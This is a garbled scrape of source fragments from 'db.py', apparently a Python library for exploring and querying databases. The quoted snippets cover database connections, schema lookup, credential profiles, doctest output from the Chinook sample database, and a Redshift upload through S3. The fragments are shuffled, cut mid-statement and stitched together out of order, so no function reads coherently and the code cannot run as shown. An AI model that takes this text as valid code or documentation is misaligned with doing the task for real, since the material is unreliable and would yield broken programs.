\\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\" if sql", "is the table name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys = defaultdict(list) for rel in self.cur:", "k in ('schema', 'name', 'foreign_keys', 'ref_keys')} # col metadata: format as list of", "up to the Chinook DB See http://chinookdatabase.codeplex.com/ for more info. \"\"\" _ROOT =", "port = 5432 elif dbtype==\"redshift\": port = 5439 elif dbtype==\"mysql\": port = 3306", "0.99 1 0.99 db.query(\"select * from Track\", limit=10) TrackId Name AlbumId MediaTypeId \\", "in self._metadata_cache: # table metadata table_meta[table['name']] = {k: table[k] for k in ('schema',", "do this in the function definition because we're # lazily importing boto only", "sys.stderr.write(\"finished!\\n\") def refresh_schema(self, exclude_system_tables=True, use_cache=False): \"\"\" Pulls your database's schema again and looks", "your environment variables s3: S3 alternative to using keys, you can use an", "Exception(\"Must specify AWS_ACCESS_KEY as either function argument or as an environment variable `AWS_ACCESS_KEY`\")", "tables: tables[table_name] = [] tables[table_name].append(Column(self.con, self._query_templates, table_schema, table_name, column_name, data_type, self.keys_per_column)) return tables", "bucket.list(): key.delete() if not s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def to_dict(self): \"\"\"Dict representation of the", "os.path.expanduser(\"~\") if s3: f = os.path.join(user, S3_PROFILE_ID + name) else: f = os.path.join(user,", "2 3 Restless and Wild 2 3 4 Let There Be Rock 1", "item in data] query = [str(item) for item in query] if union==True: query", "{\"cols\": [\"AlbumId\", \"Title\", \"ArtistId\"]} >>> len(db.query(q, data=data, union=False)) 347 db.query(q, data=data, union=False) AlbumId", "is not None: pass else: raise Exception(\"Database type not specified! Must select one", "pymssql HAS_PYMSSQL = True except ImportError: HAS_PYMSSQL = False DBPY_PROFILE_ID = \".db.py_\" S3_PROFILE_ID", "your database (i.e. \"dw\", \"prod\") \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) if f: creds", "3 2 5 6 Put The Finger On You 1 1 6 7", "for f in os.listdir(user): if f.startswith(\".db.py_\"): profile = load_from_json(os.path.join(user, f)) tables = profile.pop('tables',", "try: open(f) except: raise Exception(\"Profile '{0}' does not exist. Could not find file", "self.con.rollback() def to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None, print_sql=False, bucket_location=None, s3_bucket=None):", "union: bool Whether or not \"UNION ALL\" handlebars templates. This will return any", "the foreign and reference keys. This is used to control the rendering of", "db.find_table(\"A*\") +--------+--------------------------+ | Table | Columns | +--------+--------------------------+ | Album | AlbumId, Title,", "loading is performed for col in table['columns']: col_meta.append((col['schema'], col['table'], col['name'], col['type'])) else: sys.stderr.write(\"Refreshing", "Name | NVARCHAR(120) | | MediaType | Name | NVARCHAR(120) | | Playlist", "Whether or not to include \"system\" tables (the ones that the database needs", "342562 5510424 <BLANKLINE> UnitPrice 0 0.99 1 0.99 db.query(\"select * from Track\", limit=10)", "\"Artist\"}, ... {\"name\": \"Track\"} ... ] >>> db.query(q, data=data) table_name cnt 0 Album", "self.schemas]) q = self._query_templates['system']['schema_specified'] % schemas_str elif exclude_system_tables: q = self._query_templates['system']['schema_no_system'] else: q", "self.cur = self.con.cursor() elif HAS_PYMSSQL: if '\\\\' in self.hostname: hostname = self.hostname elif", "TABLE\", \"CREATE TABLE IF NOT EXISTS\") if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit()", "1 1 2 Balls to the Wall 2 2 2 3 Fast As", "f = os.path.join(user, DBPY_PROFILE_ID + name) try: try: open(f) except: raise Exception(\"Profile '{0}'", "self.cur.execute(\"SELECT name, sql FROM sqlite_master where sql like '%REFERENCES%';\") # find for foreign", "ImportError: HAS_PG = False try: import MySQLdb mysql_connect = MySQLdb.connect HAS_MYSQL = True", "= [] tables[table_name].append(Column(self.con, self._query_templates, table_schema, table_name, column_name, data_type, self.keys_per_column)) return tables def _try_command(self,", "in ('schema', 'name', 'foreign_keys', 'ref_keys')} # col metadata: format as list of tuples,", "returns all columns ending w/ Id +---------------+---------------+---------+ | Table | Column Name |", "| Invoice | BillingAddress | NVARCHAR(70) | | InvoiceLine | InvoiceLineId | INTEGER", "through your database's schema for a column. Parameters ----------- search: str glob pattern", "little sister from stealing your passwords. Parameters ---------- profile: str (optional) identifier/name for", "CSV IGNOREHEADER as 1 GZIP; \"\"\".format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql: sys.stderr.write(sql +", "user = os.path.expanduser(\"~\") for f in os.listdir(user): if f.startswith(\".db.py_\"): profile = load_from_json(os.path.join(user, f))", "as f: f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return i threads = [] for i", "e: raise Exception(\"Could not remove profile {0}! Excpetion: {1}\".format(name, e)) def DemoDB(keys_per_column=None, **kwargs):", "table_name, column_name, data_type, self.keys_per_column)) return tables def _try_command(self, cmd): try: self.cur.execute(cmd) except Exception", "sqlite3 as sqlite HAS_SQLITE = True except ImportError: HAS_SQLITE = False try: import", "as f: ... f.write(q) 109 >>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10 db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title \\", "if s3_bucket: bucket = conn.get_bucket(s3_bucket) bucket_name = s3_bucket else: bucket = conn.create_bucket(bucket_name, location=bucket_location)", "use_cache: # generate our Tables, and load them into a TableSet self._tables =", "9 Evil Walks 0.99 \"\"\" with open(filename) as fp: q = fp.read() return", "db.query(q, data=data, union=False) AlbumId Title ArtistId 0 1 For Those About To Rock", "ArtistId | | Artist | ArtistId, Name | +--------+--------------------------+ >>> results = db.find_table(\"tmp*\")", "try: import pymysql mysql_connect = pymysql.connect HAS_MYSQL = True except ImportError: HAS_MYSQL =", "and isinstance(getattr(table, col), Column) and getattr(table, col).type not in data_type: continue if isinstance(getattr(table,", "it doens't exist sql = sql.replace(\"CREATE TABLE\", \"CREATE TABLE IF NOT EXISTS\") if", "= {} for arg in [\"username\", \"password\", \"hostname\", \"port\", \"dbname\"]: if getattr(self, arg):", "Column) and getattr(table, col).type not in data_type: continue if isinstance(getattr(table, col), Column): cols.append(getattr(table,", "Restless and Wild 2 3 4 Let There Be Rock 1 4 5", "You) 1 1 1 2 Balls to the Wall 2 2 <BLANKLINE> GenreId", "| | Employee | Address | NVARCHAR(70) | | Genre | GenreId |", "only available for redshift.\") try: from boto.s3.connection import S3Connection from boto.s3.key import Key", "q: str Query string to execute data: list, dict Optional argument for handlebars-queries.", "8, etc AWS_ACCESS_KEY: str your aws access key. if this is None, the", "= conn.create_bucket(bucket_name, location=bucket_location) # we're going to chunk the file into pieces. according", "library. Please ensure it is installed\") if s3 is not None: AWS_ACCESS_KEY =", "Track | GenreId | INTEGER | | Track | Bytes | INTEGER |", "type(s) you want to return Examples ---------- >>> from db import DemoDB >>>", "vars(table): if glob.fnmatch.fnmatch(col, search): if data_type and isinstance(getattr(table, col), Column) and getattr(table, col).type", "203102 9 1 <NAME>, <NAME>, <NAME> 263497 Bytes UnitPrice 0 11170334 0.99 1", "0.99 9 Evil Walks 0.99 >>> template = ''' ... SELECT ... '{{", "tmp_dbpy_schema(table_name varchar, column_name varchar, data_type varchar);\") for row in rows_to_insert: self.cur.execute(\"insert into tmp_dbpy_schema(table_name,", "u'kermit'}} \"\"\" profiles = {} user = os.path.expanduser(\"~\") for f in os.listdir(user): if", "tables. limit: int, None Default number of records to return in a query.", "To Rock (We Salute You) 1 1 1 2 Balls to the Wall", "try: from StringIO import StringIO # Python 2.7 except: from io import StringIO", "all. profile: str Preconfigured database credentials / profile for how you like your", "| PlaylistTrack | TrackId | INTEGER | | PlaylistTrack | PlaylistId | INTEGER", "\"port\": self.port, \"filename\": db_filename, \"dbname\": self.dbname, \"dbtype\": self.dbtype, \"schemas\": self.schemas, \"limit\": self.limit, \"keys_per_column\":", "query = [str(item) for item in query] if union==True: query = \"\\nUNION ALL\".join(query)", "Name UnitPrice 0 For Those About To Rock (We Salute You) 0.99 1", "order, making doctest fail. db.find_column(\"Name\") # returns all columns named \"Name\" +-----------+-------------+---------------+ |", "... {{ . }} ... {{else}} ... {{ . }} , ... {{/if}}", "elif profile is not None: pass else: raise Exception(\"Database type not specified! Must", "conn.create_bucket(bucket_name, location=bucket_location) # we're going to chunk the file into pieces. according to", "sys.stderr.write(sql + \"\\n\") self._try_command(sql) # generate schema from pandas and then adapt for", "need to convert it to Postgres sql = sql.replace(\"[\", \"\").replace(\"]\", \"\") # we'll", "347 1 Artist 275 2 Track 3503 >>> q = ''' ... SELECT", "self.dbtype!=\"redshift\": raise Exception(\"Sorry, feature only available for redshift.\") try: from boto.s3.connection import S3Connection", "REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\" if sql is None: continue for (column_name, foreign_table, foreign_key) in", "About To Rock We Salute You 1 1 2 Balls to the Wall", "be passed to the template and rendered using handlebars. union: bool Whether or", "if sql is None: continue for (column_name, foreign_table, foreign_key) in re.findall(rgx, sql): foreign_keys.append((table_name,", "Those About To Rock We Salute You 1 Balls to the Wall 2", "limit=10) TrackId Name AlbumId MediaTypeId \\ 0 1 For Those About To Rock", "self.cur.execute(q) col_meta = self.cur return col_meta, table_meta def _gen_tables_from_col_tuples(self, cols): tables = {}", "Please ensure it is installed\") self.con = sqlite.connect(self.filename) self.cur = self.con.cursor() self._create_sqlite_metatable() elif", "sys.stderr.write(\".\") return i threads = [] for i in chunks: t = threading.Thread(target=upload_chunk,", "a single data frame. limit: int Number of records to return Examples --------", "number of keys to display in the foreign and reference keys. This is", "rel in self.cur: # second value in relationship tuple is the table name", "Snowballed 0.99 9 Evil Walks 0.99 \"\"\" with open(filename) as fp: q =", "Customer | Address | NVARCHAR(70) | | Employee | Address | NVARCHAR(70) |", "self._exclude_system_tables = exclude_system_tables self.handlebars = pybars.Compiler() @property def tables(self): \"\"\"A lazy loaded reference", "query_from_file(self, filename, data=None, union=True, limit=None): \"\"\" Query your database from a file. Parameters", "you want to save to the db drop_if_exists: bool (False) whether you'd like", "bucket_name = s3_bucket else: bucket = conn.create_bucket(bucket_name, location=bucket_location) # we're going to chunk", "database credentials so you don't have to save them in script. Parameters ----------", "DemoDB >>> db = DemoDB() db.query(\"select * from Track\").head(2) TrackId Name AlbumId MediaTypeId", "q = \"select top {limit} * from ({q}) q\".format(limit=limit, q=q) return q def", "or pymssql libraries. Please ensure one of them is installed\") if HAS_ODBC: base_con", "\"\"\" Save your database credentials so you don't have to save them in", "+-----------+-------------+---------------+ | Table | Column Name | Type | +-----------+-------------+---------------+ | Artist |", "To Rock We Salute You 1 Balls to the Wall 2 Restless and", "upload and COPY from S3. Upload speed is *much* faster if chunks =", "list): query = [template(item) for item in data] query = [str(item) for item", "and 'schema_specified' in \\ self._query_templates['system']: schemas_str = ','.join([repr(schema) for schema in self.schemas]) q", "252051 4 1 Deaffy & R.A. Smith-Diesel 375418 5 1 <NAME>, <NAME>, <NAME>", "You 0.99 6 Let's Get It Up 0.99 7 Inject The Venom 0.99", "in tables: tables[table_name] = [] tables[table_name].append(Column(self.con, self._query_templates, table_schema, table_name, column_name, data_type, self.keys_per_column)) return", "= creds.get('username') self.password = creds.get('password') self.hostname = creds.get('hostname') self.port = creds.get('port') self.filename =", "profile: str (optional) identifier/name for your database (i.e. \"dw\", \"prod\") \"\"\" f =", "will be executed bucket_location: boto.s3.connection.Location a specific AWS location in which to create", "boto only if necessary here. if bucket_location is None: bucket_location = Location.DEFAULT except", "MySQLdb.connect HAS_MYSQL = True except ImportError: try: import pymysql mysql_connect = pymysql.connect HAS_MYSQL", "your redshift cluster's region. Examples -------- \"\"\" if self.dbtype!=\"redshift\": raise Exception(\"Sorry, feature only", "Album a ... INNER JOIN ... Track t ... on a.AlbumId = t.AlbumId;", "of the database as credentials plus tables dict representation.\"\"\" db_dict = self.credentials db_dict.update(self.tables.to_dict())", "mode=\"w\") as f: f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return i threads = [] for", "limit: q = q.rstrip().rstrip(\";\") q = \"select * from ({q}) q limit {limit}\".format(q=q,", "from db import DemoDB >>> db = DemoDB() >>> q = ''' ...", "driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", port=self.port, database=self.dbname or '', uid=self.username, pwd=<PASSWORD>)", "INTEGER | | Invoice | BillingAddress | NVARCHAR(70) | | InvoiceLine | InvoiceLineId", "union==True: query = \"\\nUNION ALL\".join(query) else: query = \"\\n\".join(query) elif isinstance(data, dict): query", "{}).get('foreign_keys_for_db', None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys = defaultdict(list) for rel in self.cur: # second", "= os.path.join(user, S3_PROFILE_ID + name) else: f = os.path.join(user, DBPY_PROFILE_ID + name) try:", "drop_if_exists: bool (False) whether you'd like to drop the table if it already", "Examples -------- db = DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\") from db import DB try: __import__('imp').find_module('psycopg2')", "def save_metadata(self, profile=\"default\"): \"\"\"Save the database credentials, plus the database properties to your", "a TableSet self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for", "'{0}' does not exist. Could not find file {1}\".format(name, f)) os.remove(f) except Exception", "redshift\") self._use_cache = cache if dbtype not in (\"sqlite\", \"mssql\") and username is", "not HAS_ODBC and not HAS_PYMSSQL: raise Exception(\"Couldn't find pyodbc or pymssql libraries. Please", "if data_type and isinstance(getattr(table, col), Column) and getattr(table, col).type not in data_type: continue", "def query(self, q, data=None, union=True, limit=None): \"\"\" Query your database with a raw", "what you're looking for Examples ---------- >>> from db import DemoDB >>> db", "= self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta = self.cur return col_meta, table_meta def _gen_tables_from_col_tuples(self, cols): tables", "| CustomerId | INTEGER | | Employee | ReportsTo | INTEGER | |", "_get_db_metadata(self, exclude_system_tables, use_cache): col_meta = [] table_meta = {} # pull out column", "modes for refreshing schema # 1. load directly from cache # 2. use", "(i.e. \"dw\", \"prod\") from db import DB import pymysql db = DB(username=\"hank\", password=\"<PASSWORD>\",", "0.99 7 Inject The Venom 0.99 8 Snowballed 0.99 9 Evil Walks 0.99", "3. use the naive approach if use_cache: # generate our Tables, and load", "is None: AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY is None: raise Exception(\"Must specify AWS_ACCESS_KEY", "Name | Type | +-------------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | |", "q = self._assign_limit(q, limit) return pd.read_sql(q, self.con) def query_from_file(self, filename, data=None, union=True, limit=None):", "| Table | Column Name | Type | +-------------+----------------+--------------+ | Customer | Address", "To Rock We Salute You Name UnitPrice 0 For Those About To Rock", "pandas as pd import pybars from .column import Column, ColumnSet from .table import", "mssql, or redshift\") self._query_templates = query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\" or self.dbtype==\"redshift\": if not HAS_PG:", "| | Genre | Name | NVARCHAR(120) | | MediaType | Name |", "__delete__(self): del self.cur del self.con def load_credentials(self, profile=\"default\"): \"\"\" Loads crentials for a", "# find for foreign keys self.cur.execute(\"drop table if exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp table", "our Tables, and load them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema,", "Exception(\"Couldn't find MySQLdb or pymysql library. Please ensure it is installed\") creds =", "\"\"\"Dict representation of the database as credentials plus tables dict representation.\"\"\" db_dict =", "Columns | +--------+--------------------------+ | Album | AlbumId, Title, ArtistId | | Artist |", "Salute You) 0.99 1 Balls to the Wall 0.99 2 Fast As a", "Please ensure one of them is installed\") if HAS_ODBC: base_con = \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver", "q = ''' ... SELECT ... {{#cols}} ... {{#if @last}} ... {{ .", "col metadata: format as list of tuples, to match how normal loading is", "table['columns']: col_meta.append((col['schema'], col['table'], col['name'], col['type'])) else: sys.stderr.write(\"Refreshing schema. Please wait...\") if self.schemas is", "isinstance(self.schemas, list) and 'schema_specified' in \\ self._query_templates['system']: schemas_str = ','.join([repr(schema) for schema in", "self._tables = TableSet([]) self._exclude_system_tables = exclude_system_tables self.handlebars = pybars.Compiler() @property def tables(self): \"\"\"A", "\"INTEGER\"]) # returns all columns have an \"e\" and are NVARCHAR(70)S or INTEGERS", "list_profiles(): \"\"\" Lists all of the database profiles available Examples -------- No doctest,", "data_type=None): \"\"\" Aggresively search through your database's schema for a column. Parameters -----------", "Parameters ---------- profile: str (optional) identifier/name for your database (i.e. \"dw\", \"prod\") from", "| InvoiceLineId | INTEGER | | InvoiceLine | InvoiceId | INTEGER | |", "there will be no limit (That's right, you'll be limitless. Bradley Cooper style.)", "str(query) else: return q return query def query(self, q, data=None, union=True, limit=None): \"\"\"", "... f.write(q) 109 >>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10 db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title \\ 0 For", "all of the data*.gz files we've created sys.stderr.write(\"Copying data from s3 to redshfit...\")", "as pyo HAS_ODBC = True except ImportError: HAS_ODBC = False try: import pymssql", "| Playlist | PlaylistId | INTEGER | | PlaylistTrack | TrackId | INTEGER", "relationship tuple is the table name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys = defaultdict(list) for rel", "all columns ending w/ Id +---------------+---------------+---------+ | Table | Column Name | Type", "sqlite.connect(self.filename) self.cur = self.con.cursor() self._create_sqlite_metatable() elif self.dbtype==\"mysql\": if not HAS_MYSQL: raise Exception(\"Couldn't find", "for getting all key relationships # 3. use the naive approach if use_cache:", "self.dbtype in [\"postgres\", \"redshift\", \"sqlite\", \"mysql\"]: if limit: q = q.rstrip().rstrip(\";\") q =", "doctest fail. db.find_column(\"Name\") # returns all columns named \"Name\" +-----------+-------------+---------------+ | Table |", "Profiles are stored in ~/.db.py_{profile_name} and are a base64 encoded JSON file. This", "None elif dbtype==\"mssql\": port = 1433 elif profile is not None: pass else:", "from sqlite_master where type='table';\")] for table in tables: for row in self.cur.execute(\"pragma table_info('{0}')\".format(table)):", "\"\"\" if self.dbtype!=\"redshift\": raise Exception(\"Sorry, feature only available for redshift.\") try: from boto.s3.connection", "return i threads = [] for i in chunks: t = threading.Thread(target=upload_chunk, args=(i,", "are a base64 encoded JSON file. This is not to say this a", "mysql_connect = pymysql.connect HAS_MYSQL = True except ImportError: HAS_MYSQL = False try: import", "database's schema again and looks for any new tables and columns. \"\"\" col_meta,", "(We Salute You) 0.99 1 Balls to the Wall 0.99 2 Fast As", "DB(object): \"\"\" Utility for exploring and querying a database. Parameters ---------- username: str", "to import the relevant database libraries # TODO: maybe add warnings? try: import", "| Column Name | Type | +-------------+----------------+--------------+ | Customer | Address | NVARCHAR(70)", "for redshift sql = pd.io.sql.get_schema(df, name) # defaults to using SQLite format. need", "1 1 GenreId Composer Milliseconds \\ 0 1 <NAME>, <NAME>, <NAME> 343719 1", "pass \"\"\" def __init__(self, username=None, password=<PASSWORD>, hostname=\"localhost\", port=None, filename=None, dbname=None, dbtype=None, schemas=None, profile=\"default\",", "= DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\") db = DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except ImportError: pass \"\"\"", "ImportError: try: import pypyodbc as pyo HAS_ODBC = True except ImportError: HAS_ODBC =", "= self.load_metadata(profile) else: self.username = username self.password = password self.hostname = hostname self.port", "chunks = multiple-of-slices. Ex: DW1.XL nodes have 2 slices per node, so if", "Dawn 3 2 5 6 Put The Finger On You 1 1 6", "else: profile['metadata'] = False profiles[f[7:]] = profile return profiles def remove_profile(name, s3=False): \"\"\"", "= \"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket: bucket = conn.get_bucket(s3_bucket) bucket_name = s3_bucket else: bucket =", "Column Name | Type | +---------------+---------------+---------+ | Album | AlbumId | INTEGER |", "+-------------+----------------+--------------+ \"\"\" if isinstance(data_type, str): data_type = [data_type] cols = [] for table", "<NAME> 263497 Bytes UnitPrice 0 11170334 0.99 1 5510424 0.99 2 3990994 0.99", ">>> q = ''' ... SELECT ... a.Title, ... t.Name, ... t.UnitPrice ...", "for your shiny new table df: DataFrame data frame you want to save", "and COPY from S3. Upload speed is *much* faster if chunks = multiple-of-slices.", "if running 2 nodes you will want chunk_size=4, 8, etc AWS_ACCESS_KEY: str your", "EmployeeId | INTEGER | | Employee | Address | NVARCHAR(70) | | Genre", "to run the \\COPY statment. # # see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0} to s3", "using keys, you can use an S3 object print_sql: bool (False) option for", "| | Track | MediaTypeId | INTEGER | | Track | GenreId |", "... COUNT(*) as cnt ... FROM ... {{ name }} ... GROUP BY", "all columns have an \"e\" and are NVARCHAR(70)S or INTEGERS +-------------+----------------+--------------+ | Table", "\"Title\", \"ArtistId\"]} >>> len(db.query(q, data=data, union=False)) 347 db.query(q, data=data, union=False) AlbumId Title ArtistId", "DW1.XL nodes have 2 slices per node, so if running 2 nodes you", "| Track | TrackId | INTEGER | | Track | AlbumId | INTEGER", "keys to display in the foreign and reference keys. This is used to", "self.hostname: hostname = self.hostname elif hasattr(self, 'port'): hostname = '{0}:{1}'.format(self.hostname, self.port) else: hostname", "def _gen_tables_from_col_tuples(self, cols): tables = {} # generate our Columns, and attach to", "0: self.refresh_schema(self._exclude_system_tables, self._use_cache) return self._tables def __str__(self): return \"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname,", "arg==\"dbname\": arg = \"db\" elif arg==\"hostname\": arg = \"host\" creds[arg] = value self.con", "S3 object print_sql: bool (False) option for printing sql statement that will be", "None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) else: self.username = username self.password =", "<NAME> 233926 7 1 <NAME>, <NAME>, <NAME> 210834 8 1 <NAME>, <NAME>, <NAME>", "}} ... {{else}} ... {{ . }} , ... {{/if}} ... {{/cols}} ...", "keys self.cur.execute(\"drop table if exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar,", "7 For Those About To Rock We Salute You 8 For Those About", "specify which data type(s) you want to return Examples ---------- >>> from db", "data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) # returns all columns have an \"e\" and are NVARCHAR(70)S or", "NVARCHAR(70) | | Genre | GenreId | INTEGER | | Invoice | InvoiceId", "for (table_name, sql) in self.cur: rgx = \"FOREIGN KEY \\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\"", "AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\") # tear down the", "generate schema from pandas and then adapt for redshift sql = pd.io.sql.get_schema(df, name)", "hostname = '{0}:{1}'.format(self.hostname, self.port) else: hostname = self.hostname self.con = pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>,", "\"e\" and are NVARCHAR(70)S or INTEGERS +-------------+----------------+--------------+ | Table | Column Name |", "port for db. portgres: 5432 redshift: 5439 mysql: 3306 sqlite: n/a mssql: 1433", "DB(username=\"dev\", hostname=\"localhost\", port=5432, dbname=\"devdb\", dbtype=\"postgres\") db = DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\")", "self.handlebars = pybars.Compiler() @property def tables(self): \"\"\"A lazy loaded reference to the table", "INTEGER | | Employee | ReportsTo | INTEGER | | Employee | EmployeeId", "if isinstance(getattr(table, col), Column): cols.append(getattr(table, col)) return ColumnSet(cols) def _assign_limit(self, q, limit=1000): #", "if cache: self._metadata_cache = self.load_metadata(profile) else: self.username = username self.password = password self.hostname", ";\") for (table_name, sql) in self.cur: rgx = \"FOREIGN KEY \\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\]", "raise Exception(\"Sorry, feature only available for redshift.\") try: from boto.s3.connection import S3Connection from", "Customer | Address | NVARCHAR(70) | | Customer | SupportRepId | INTEGER |", "be no limit (That's right, you'll be limitless. Bradley Cooper style.) keys_per_column: int,", "{\"name\": \"Album\"}, ... {\"name\": \"Artist\"}, ... {\"name\": \"Track\"} ... ] >>> db.query(q, data=data)", "profile.\"\"\" if len(self.tables) > 0: f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.to_dict()) @property def", "os.path.join(user, S3_PROFILE_ID + name) else: f = os.path.join(user, DBPY_PROFILE_ID + name) try: try:", "None, u'port': 5432, u'username': None}, 'muppets': {u'dbname': u'muppetdb', u'dbtype': u'postgres', u'filename': None, u'hostname':", "from a file. Parameters ---------- filename: str A SQL script data: list, dict", "either function argument or as an environment variable `AWS_SECRET_KEY`\") conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY)", "\"user\" elif arg==\"password\": arg = \"<PASSWORD>\" elif arg==\"dbname\": arg = \"db\" elif arg==\"hostname\":", "def find_table(self, search): \"\"\" Aggresively search through your database's schema for a table.", "pd.io.sql.get_schema(df, name) # defaults to using SQLite format. need to convert it to", "foreign_table, foreign_key)) for row in foreign_keys: sql_insert = \"insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table,", "Your username for the database password: str Your password for the database hostname:", "'%REFERENCES%';\") # find for foreign keys self.cur.execute(\"drop table if exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp", "Genre | Name | NVARCHAR(120) | | MediaType | Name | NVARCHAR(120) |", "self.con.cursor() elif self.dbtype==\"mssql\": if not HAS_ODBC and not HAS_PYMSSQL: raise Exception(\"Couldn't find pyodbc", "Inject The Venom 0.99 8 Snowballed 0.99 9 Evil Walks 0.99 \"\"\" with", "to s3 in chunks\".format(name)) len_df = len(df) chunks = range(0, len_df, chunk_size) def", "4 Restless and Wild 3 2 4 5 Princess of the Dawn 3", "probably don't need this, but if you're a db admin you might actually", "DB(profile=\"staging\") >>> from db import DemoDB >>> db = DemoDB() >>> db.save_credentials(profile='test') \"\"\"", "col), Column): cols.append(getattr(table, col)) return ColumnSet(cols) def _assign_limit(self, q, limit=1000): # postgres, mysql,", "to execute data: list, dict Optional argument for handlebars-queries. Data will be passed", "bucket_name = \"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket: bucket = conn.get_bucket(s3_bucket) bucket_name = s3_bucket else: bucket", "INTEGER | | Track | GenreId | INTEGER | +---------------+---------------+---------+ db.find_column(\"*Address*\") # returns", "{u'dbname': None, u'dbtype': u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost', u'password': None, u'port': 5432, u'username':", "No doctest, covered by unittest list_profiles() {'demo': {u'dbname': None, u'dbtype': u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite',", "database as credentials plus tables dict representation.\"\"\" db_dict = self.credentials db_dict.update(self.tables.to_dict()) return db_dict", "COPY from S3. Upload speed is *much* faster if chunks = multiple-of-slices. Ex:", "Restless and Wild 5 For Those About To Rock We Salute You 6", "db_filename = os.path.join(os.getcwd(), self.filename) else: db_filename = None return { \"username\": self.username, \"password\":", "Excpetion: {1}\".format(name, e)) def DemoDB(keys_per_column=None, **kwargs): \"\"\" Provides an instance of DB that", "= 5439 elif dbtype==\"mysql\": port = 3306 elif dbtype==\"sqlite\": port = None elif", "else: db_filename = None return { \"username\": self.username, \"password\": self.password, \"hostname\": self.hostname, \"port\":", "sqlite HAS_SQLITE = True except ImportError: HAS_SQLITE = False try: import pyodbc as", "InvoiceLine | TrackId | INTEGER | | InvoiceLine | InvoiceLineId | INTEGER |", "load them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column,", "sql = \"DROP TABLE IF EXISTS {0};\".format(name) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql)", "return db_dict def list_profiles(): \"\"\" Lists all of the database profiles available Examples", "= mysql_connect(**creds) self.con.autocommit(True) self.cur = self.con.cursor() elif self.dbtype==\"mssql\": if not HAS_ODBC and not", "... FROM ... Album; ... ''' >>> data = {\"cols\": [\"AlbumId\", \"Title\", \"ArtistId\"]}", "<NAME>-Diesel, <NAME>, U. D... 252051 4 1 Deaffy & R.A. Smith-Diesel 375418 5", "s3 in chunks\".format(name)) len_df = len(df) chunks = range(0, len_df, chunk_size) def upload_chunk(i):", "1 7 8 Inject The Venom 1 1 8 9 Snowballed 1 1", "configured!\") def save_credentials(self, profile=\"default\"): \"\"\" Save your database credentials so you don't have", "file into pieces. according to amazon, this is # much faster when it", "profile_path(DBPY_PROFILE_ID, profile) if f: prof = load_from_json(f) return prof.get('tables', None) def save_metadata(self, profile=\"default\"):", "INTEGER | | Customer | CustomerId | INTEGER | | Employee | EmployeeId", "your database from a file. Parameters ---------- filename: str A SQL script data:", "import pymssql HAS_PYMSSQL = True except ImportError: HAS_PYMSSQL = False DBPY_PROFILE_ID = \".db.py_\"", "\"\"\"Dict representation of all credentials for the database.\"\"\" if self.filename: db_filename = os.path.join(os.getcwd(),", "available elif not use_cache and isinstance(self._query_templates.get('system', 